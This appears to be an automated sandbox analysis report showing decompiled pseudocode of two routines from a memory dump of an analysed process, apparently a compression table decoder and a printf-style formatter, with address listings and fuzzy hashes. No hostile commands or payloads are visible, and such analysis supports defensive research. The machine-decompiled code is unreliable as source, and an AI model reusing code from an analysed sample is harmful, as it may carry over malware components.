                            0x00a0409c
                            0x00a040a1
                            0x00a040a1
                            0x00a040a4
                            0x00a040aa
                            0x00a040ac
                            0x00a040af
                            0x00a040bf
                            0x00a040c4
                            0x00a040c4
                            0x00a040d9
                            0x00a040de
                            0x00a040e1
                            0x00a040e6
                            0x00a040e9
                            0x00a040eb
                            0x00a040ed
                            0x00a040f0
                            0x00a040f3
                            0x00a04100
                            0x00a04105
                            0x00a04105
                            0x00a040f3
                            0x00a0410c
                            0x00a04111
                            0x00a04114
                            0x00a04119
                            0x00a0411c
                            0x00a0411e
                            0x00a0412b
                            0x00a04130
                            0x00a0411e
                            0x00000000
                            0x00a04133
                            0x00a04083
                            0x00a04084
                            0x00a04087
                            0x00000000
                            0x00000000
                            0x00a04089
                            0x00000000
                            0x00a04089
                            0x00a04070
                            0x00a04072
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a04072
                            0x00a0405d
                            0x00a0405e
                            0x00a04061
                            0x00000000
                            0x00000000
                            0x00a04063
                            0x00000000
                            0x00a04063
                            0x00000000
                            0x00a04050
                            0x00a04041
                            0x00a04042
                            0x00a04045
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a04045
                            0x00a04010
                            0x00a04013
                            0x00a04015
                            0x00a04020
                            0x00a04022
                            0x00a0402a
                            0x00a0402c
                            0x00a0402e
                            0x00000000
                            0x00000000
                            0x00a04030
                            0x00a04034
                            0x00a04034
                            0x00000000
                            0x00a04034
                            0x00a04024
                            0x00a04019
                            0x00a04019
                            0x00a0401a
                            0x00000000
                            0x00a0401a
                            0x00a04017
                            0x00000000
                            0x00a04017
                            0x00a03f4b
                            0x00a03f4b
                            0x00000000
                            0x00a03f4b
                            0x00a03fd7
                            0x00a03fd7
                            0x00a03fda
                            0x00a03fac
                            0x00a03fac
                            0x00a03fad
                            0x00a03faf
                            0x00a03fb1
                            0x00000000
                            0x00a03fb1
                            0x00a03fdc
                            0x00a03fdf
                            0x00000000
                            0x00000000
                            0x00a03fe5
                            0x00a03f54
                            0x00a03f54
                            0x00000000
                            0x00a03f54
                            0x00a03f80
                            0x00a03fc3
                            0x00000000
                            0x00a03fc3
                            0x00a03f82
                            0x00a03f85
                            0x00a03fb8
                            0x00a03fba
                            0x00000000
                            0x00a03fba
                            0x00a03f87
                            0x00a03f8a
                            0x00a03fa8
                            0x00a03fa8
                            0x00a03fa8
                            0x00a03fa8
                            0x00000000
                            0x00a03fa8
                            0x00a03f8c
                            0x00a03f8f
                            0x00a03fa1
                            0x00000000
                            0x00a03fa1
                            0x00a03f91
                            0x00a03f94
                            0x00000000
                            0x00000000
                            0x00a03f98
                            0x00000000
                            0x00a03f98
                            0x00a03f10
                            0x00000000
                            0x00000000
                            0x00a03f16
                            0x00a03f18
                            0x00a03f58
                            0x00a03f58
                            0x00a03f5b
                            0x00a03f74
                            0x00000000
                            0x00a03f74
                            0x00a03f5d
                            0x00a03f5d
                            0x00a03f60
                            0x00000000
                            0x00000000
                            0x00a03f63
                            0x00a03f66
                            0x00000000
                            0x00000000
                            0x00a03f68
                            0x00a03f6b
                            0x00000000
                            0x00a03f6b
                            0x00a03f1a
                            0x00a03f52
                            0x00000000
                            0x00a03f52
                            0x00a03f1e
                            0x00000000
                            0x00000000
                            0x00a03f27
                            0x00000000
                            0x00000000
                            0x00a03f2c
                            0x00000000
                            0x00000000
                            0x00a03f31
                            0x00000000
                            0x00000000
                            0x00a03f3a
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb69f357da4f5948e15651f9ba01334cd96aca68b961b3322f5ce582cdc77ca6
                            • Instruction ID: d0805af3ab351219540155198a0b38aeea3a2b3a64024714ff938b9d6089261f
                            • Opcode Fuzzy Hash: cb69f357da4f5948e15651f9ba01334cd96aca68b961b3322f5ce582cdc77ca6
                            • Instruction Fuzzy Hash: AB6157F2A0070E66DE349B28B9917BE23BCBB49740F10461AE783EF1C1D655DF868255
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F397F, Relevance: .2, Instructions: 232COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E009F397F(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E009EA4E8(_t168) >> 0x0000000c & 0x000000ff;
							E009EA4D1(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E009EA4E8(_t168) >> 0x0000000c & 0x000000ff;
							E009EA4D1(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E009F2C88();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E009EA4ED(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E009EA4E8(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E009EA4E8(_t139) >> 0xd) + 3;
													_push(3);
												}
												E009EA4D1(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E009EA4E8(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E009EA4E8(_t139) >> 0xd) + 3;
												_push(3);
											}
											E009EA4D1(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E009F4422(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E009F2C88();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E009F2C88();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E009F2C88();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E009F2C88();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E009F4422(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

































                            0x009f398e
                            0x009f3990
                            0x009f399a
                            0x009f39a1
                            0x009f39a5
                            0x009f39c1
                            0x009f39c2
                            0x009f39c2
                            0x009f39c5
                            0x009f39d3
                            0x009f39d6
                            0x009f39db
                            0x009f39de
                            0x009f3a17
                            0x00000000
                            0x009f3a17
                            0x009f39ee
                            0x009f39f1
                            0x009f39f6
                            0x009f39f8
                            0x009f3a01
                            0x009f3a01
                            0x009f3a04
                            0x009f3a04
                            0x009f3a05
                            0x009f3a08
                            0x00000000
                            0x00000000
                            0x009f3a0a
                            0x009f3a0f
                            0x009f3a10
                            0x009f3a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3a12
                            0x009f3a14
                            0x00000000
                            0x009f3a14
                            0x009f39fa
                            0x009f3a1b
                            0x009f3a1b
                            0x009f3a1c
                            0x009f3a1c
                            0x009f3a2c
                            0x009f3a2e
                            0x009f3a36
                            0x009f3a37
                            0x009f3a38
                            0x009f3a3c
                            0x009f3a41
                            0x009f3a41
                            0x009f3a43
                            0x009f3a43
                            0x009f3a47
                            0x009f3a65
                            0x009f3a67
                            0x009f3a6e
                            0x009f3a74
                            0x009f3a7a
                            0x009f3a7e
                            0x009f3aab
                            0x009f3aac
                            0x009f3aad
                            0x009f3ab1
                            0x009f3ab3
                            0x009f3ace
                            0x009f3ad1
                            0x009f3add
                            0x009f3adf
                            0x009f3ae3
                            0x009f3ae8
                            0x009f3af4
                            0x009f3af6
                            0x009f3af8
                            0x009f3afa
                            0x009f3afa
                            0x009f3afc
                            0x009f3b04
                            0x009f3b04
                            0x009f3b07
                            0x009f3b13
                            0x009f3b15
                            0x009f3b18
                            0x009f3b62
                            0x009f3b7f
                            0x009f3b7f
                            0x009f3b82
                            0x009f3b64
                            0x009f3b6e
                            0x009f3b71
                            0x009f3b71
                            0x009f3b86
                            0x009f3b8b
                            0x009f3b8b
                            0x009f3b8c
                            0x009f3b92
                            0x00000000
                            0x00000000
                            0x009f3b94
                            0x009f3b99
                            0x009f3b9a
                            0x009f3b9c
                            0x00000000
                            0x00000000
                            0x009f3b9e
                            0x009f3b9e
                            0x00000000
                            0x009f3b9e
                            0x00000000
                            0x009f3b8b
                            0x009f3b1a
                            0x009f3b1d
                            0x009f3b3a
                            0x009f3b3a
                            0x009f3b3d
                            0x009f3b1f
                            0x009f3b29
                            0x009f3b2c
                            0x009f3b2c
                            0x009f3b41
                            0x009f3b46
                            0x009f3b48
                            0x009f3bc5
                            0x009f3bc5
                            0x009f3c2c
                            0x009f3c2e
                            0x00000000
                            0x009f3b4a
                            0x009f3b4a
                            0x009f3b4a
                            0x009f3b4b
                            0x009f3b51
                            0x00000000
                            0x00000000
                            0x009f3b57
                            0x009f3b5b
                            0x009f3b5c
                            0x009f3b5e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3b60
                            0x00000000
                            0x009f3b4a
                            0x009f3b48
                            0x009f3b09
                            0x009f3b0d
                            0x00000000
                            0x009f3b0d
                            0x009f3ab8
                            0x009f3abb
                            0x009f3abb
                            0x009f3abd
                            0x00000000
                            0x00000000
                            0x009f3abf
                            0x009f3ac0
                            0x009f3ac3
                            0x009f3ac6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3ac8
                            0x009f3aca
                            0x00000000
                            0x009f3aca
                            0x009f3a82
                            0x009f3a85
                            0x009f3a8f
                            0x009f3a97
                            0x009f3a9c
                            0x009f3a9f
                            0x00000000
                            0x009f3a9f
                            0x009f3a52
                            0x009f3a54
                            0x00000000
                            0x00000000
                            0x009f3a58
                            0x009f3a5d
                            0x009f3a5f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3ba2
                            0x009f3ba2
                            0x009f3ba2
                            0x009f3bae
                            0x009f3bae
                            0x009f3bb5
                            0x009f3bb9
                            0x009f3bc9
                            0x009f3bc9
                            0x009f3bd4
                            0x009f3bd9
                            0x009f3bda
                            0x009f3bdd
                            0x009f3be2
                            0x009f3bec
                            0x009f3bf4
                            0x009f3bf5
                            0x009f3bfa
                            0x009f3c04
                            0x009f3c0c
                            0x009f3c0d
                            0x009f3c12
                            0x009f3c1a
                            0x009f3c22
                            0x009f3c25
                            0x009f3c2a
                            0x00000000
                            0x009f3c2a
                            0x009f3bbd
                            0x009f3bc3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f3bc3
                            0x009f39b0
                            0x009f39b2
                            0x00000000
                            0x00000000
                            0x009f39b4
                            0x009f39b9
                            0x009f39bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f39bb
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                            • Instruction ID: 44ca1eefb3d8402196edfaf4453ca2b287f873b2504fa2e7f32b6dc78e959fc9
                            • Opcode Fuzzy Hash: 1094cbaabbb87eae24529d212b46aee9e342c03f428bb804a3628aa9adfdf6f1
                            • Instruction Fuzzy Hash: FF71F87130434A9BDB24DF29C8D4BBD7795ABD0304F00892DEBC68B282DA7CDA85C752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A03CBA, Relevance: .2, Instructions: 214COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00A03CBA(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00A048A8(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00A03184(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00A04BA3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00A03184(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00A04A71(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00A03184(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00A046B3(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00A04890(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00A042BF(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00A047FD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00A04871(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00A041F9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00A0458B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                            0x00a03cbf
                            0x00a03cc2
                            0x00a03cc6
                            0x00a03cc9
                            0x00a03ccd
                            0x00a03cd0
                            0x00a03d3e
                            0x00a03d41
                            0x00a03d90
                            0x00a03d90
                            0x00a03d93
                            0x00a03d00
                            0x00a03d02
                            0x00a03d07
                            0x00a03d09
                            0x00a03dae
                            0x00a03db2
                            0x00a03dbb
                            0x00a03dc0
                            0x00a03dc1
                            0x00a03dc5
                            0x00a03dc7
                            0x00a03dcc
                            0x00a03dcf
                            0x00a03dd1
                            0x00a03dfa
                            0x00a03dfa
                            0x00a03dfd
                            0x00a03e00
                            0x00a03e07
                            0x00a03e09
                            0x00a03e0c
                            0x00a03e0e
                            0x00a03e12
                            0x00a03e12
                            0x00a03e15
                            0x00a03e20
                            0x00a03e20
                            0x00a03e22
                            0x00a03e22
                            0x00a03e24
                            0x00a03e2a
                            0x00a03e2a
                            0x00a03e2f
                            0x00a03e32
                            0x00a03e3d
                            0x00a03e3d
                            0x00a03e3f
                            0x00a03e3f
                            0x00a03e4a
                            0x00a03e4e
                            0x00a03e4e
                            0x00a03e51
                            0x00a03e57
                            0x00a03e59
                            0x00a03e5c
                            0x00a03e6c
                            0x00a03e71
                            0x00a03e71
                            0x00a03e86
                            0x00a03e8b
                            0x00a03e8e
                            0x00a03e93
                            0x00a03e96
                            0x00a03e98
                            0x00a03e9a
                            0x00a03e9d
                            0x00a03ea0
                            0x00a03ead
                            0x00a03eb2
                            0x00a03eb2
                            0x00a03ea0
                            0x00a03eb9
                            0x00a03ebe
                            0x00a03ec1
                            0x00a03ec6
                            0x00a03ec9
                            0x00a03ecb
                            0x00a03ed8
                            0x00a03edd
                            0x00a03ecb
                            0x00a03ee0
                            0x00a03ee3
                            0x00a03ee8
                            0x00a03ee8
                            0x00a03e34
                            0x00a03e37
                            0x00000000
                            0x00000000
                            0x00a03e39
                            0x00000000
                            0x00a03e39
                            0x00a03e26
                            0x00a03e28
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a03e28
                            0x00a03e17
                            0x00a03e1a
                            0x00000000
                            0x00000000
                            0x00a03e1c
                            0x00000000
                            0x00a03e1c
                            0x00a03e10
                            0x00a03e10
                            0x00a03e10
                            0x00000000
                            0x00a03e10
                            0x00a03e02
                            0x00a03e05
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a03e05
                            0x00a03dd5
                            0x00a03dd8
                            0x00a03dda
                            0x00a03de2
                            0x00a03de4
                            0x00a03dee
                            0x00a03df0
                            0x00a03df2
                            0x00000000
                            0x00000000
                            0x00a03df4
                            0x00a03df8
                            0x00a03df8
                            0x00000000
                            0x00a03df8
                            0x00a03de6
                            0x00000000
                            0x00a03de6
                            0x00a03ddc
                            0x00000000
                            0x00a03ddc
                            0x00a03db4
                            0x00000000
                            0x00a03db4
                            0x00a03d0f
                            0x00a03d0f
                            0x00000000
                            0x00a03d0f
                            0x00a03d9a
                            0x00a03d9a
                            0x00a03d9d
                            0x00a03d6f
                            0x00a03d6f
                            0x00a03d70
                            0x00a03d72
                            0x00a03d74
                            0x00000000
                            0x00a03d74
                            0x00a03d9f
                            0x00a03da2
                            0x00000000
                            0x00000000
                            0x00a03da8
                            0x00a03d17
                            0x00a03d17
                            0x00000000
                            0x00a03d17
                            0x00a03d43
                            0x00a03d86
                            0x00000000
                            0x00a03d86
                            0x00a03d45
                            0x00a03d48
                            0x00a03d7b
                            0x00a03d7d
                            0x00000000
                            0x00a03d7d
                            0x00a03d4a
                            0x00a03d4d
                            0x00a03d6b
                            0x00a03d6b
                            0x00a03d6b
                            0x00a03d6b
                            0x00000000
                            0x00a03d6b
                            0x00a03d4f
                            0x00a03d52
                            0x00a03d64
                            0x00000000
                            0x00a03d64
                            0x00a03d54
                            0x00a03d57
                            0x00000000
                            0x00000000
                            0x00a03d5b
                            0x00000000
                            0x00a03d5b
                            0x00a03cd2
                            0x00000000
                            0x00000000
                            0x00a03cd8
                            0x00a03cdb
                            0x00a03d1b
                            0x00a03d1b
                            0x00a03d1e
                            0x00a03d37
                            0x00000000
                            0x00a03d37
                            0x00a03d20
                            0x00a03d20
                            0x00a03d23
                            0x00000000
                            0x00000000
                            0x00a03d26
                            0x00a03d29
                            0x00000000
                            0x00000000
                            0x00a03d2b
                            0x00a03d2e
                            0x00000000
                            0x00a03d2e
                            0x00a03cdd
                            0x00a03d16
                            0x00000000
                            0x00a03d16
                            0x00a03ce2
                            0x00000000
                            0x00000000
                            0x00a03ceb
                            0x00000000
                            0x00000000
                            0x00a03cf0
                            0x00000000
                            0x00000000
                            0x00a03cf5
                            0x00000000
                            0x00000000
                            0x00a03cfe
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
